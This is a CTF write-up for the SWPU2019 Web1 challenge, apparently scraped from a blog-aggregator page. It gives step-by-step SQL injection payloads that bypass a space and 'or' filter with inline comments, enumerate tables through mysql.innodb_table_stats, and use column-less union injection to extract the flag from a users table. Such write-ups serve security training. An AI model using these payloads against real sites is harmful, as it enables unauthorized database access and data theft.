当前位置:网站首页>[SWPU2019]Web1
[SWPU2019]Web1
2022-08-05 03:59:00 【pakho_C】
[SWPU2019]Web1
Try to register as admin,It shows that it already exists, but the blasting password is not revealed
Register a test account to log in
Apply to advertise
Attempt injection
Try using single quotes, and an error is reported
ExistenceInject, try the passcode

there is filtering, try to fuzz, but limit the number of times and do not allow the same ad title
soCan only test manually, filter or order floor updatexml # - etc, and automatically eliminate spaces, try to inline comments /**/bypass
Since or is filtered, then information_schema can't be used, only no columns can be usedName injection, refer to: SQL injection without column name injection
1. Use group by to get the number of columns: 1'/**/group/**/by/**/22,'1
1'/**/group/**/by/**/23,'1
the number of columns is 22
2. Use union query to view echo points: -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
The echo point is 2 3
When looking up the table name, it is found that or is filtered and cannot be bypassed by capitalization and double writing, so information_schema cannot be used because it contains or.There are two ways to bypass
InnoDb Engine
Starting from MYSQL5.5.8, InnoDB has become its default storage engine.In versions above MYSQL 5.6, inndb adds two tables, innodb_index_stats and innodb_table_stats, both of which store information about the database and its data tables, but do not store column names.
sys database
In MYSQL above 5.7, a new sys database is added. The basic data of this library comes from information_schema and performance_chema, which does not store data itself.The table name can be obtained through the schema_auto_increment_columns in it.
Note: The sys library requires root privileges to access.innodb is disabled by default in mysql.
3. Use innodb to bypass and view the table name: -1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1 
Get the table name ads users
4. Use columnless injection to view the content of the second field in the users table:
-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1Note: Select 1, 2, 3 used for joint injection here can be tested. If they do not match, there will be a reminder
Measured as 3 columns
Get the field name flag, then the first value in the third field is flag
Change the column to be queried to 3.
-1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
边栏推荐
- UE4 通过与其它Actor互动开门
- MySql index learning and use; (I think it is detailed enough)
- pyqt5 + socket 实现客户端A经socket服务器中转后主动向客户端B发送文件
- 35岁的软件测试工程师,月薪不足2W,辞职又怕找不到工作,该何去何从?
- [TA-Frost Wolf_may-"Hundred Talents Project"] Graphics 4.3 Real-time Shadow Introduction
- 36-Jenkins-Job迁移
- [BJDCTF2020]EasySearch
- 第一次性能测试实践,有“亿”点点紧张
- Android Practical Development - Kotlin Tutorial (Introduction - Login Function Implementation 3.3)
- 重载运算符
猜你喜欢
随机推荐
Swing有几种常用的事件处理方式?如何监听事件?
Use Unity to publish APP to Hololens2 without pit tutorial
How to find all fields with empty data in sql
[GYCTF2020]EasyThinking
10 years of testing experience, worthless in the face of the biological age of 35
35岁的软件测试工程师,月薪不足2W,辞职又怕找不到工作,该何去何从?
Summary of common methods of arrays
【背包九讲——01背包问题】
Detailed and comprehensive postman interface testing practical tutorial
日志导致线程Block的这些坑,你不得不防
Redis key基本命令
36-Jenkins-Job迁移
UE4 opens doors with overlapping events
Redis1:Redis介绍、Redis基本特性、关系型数据库、非关系型数据库、数据库发展阶段
Open-Falcon of operation and maintenance monitoring system
Burp installation and proxy settings
多御安全浏览器 V10.8.3.1 版正式发布,优化多项内容
markdown如何换行——md文件
ffmpeg -sources分析
Dive into how it works together by simulating Vite









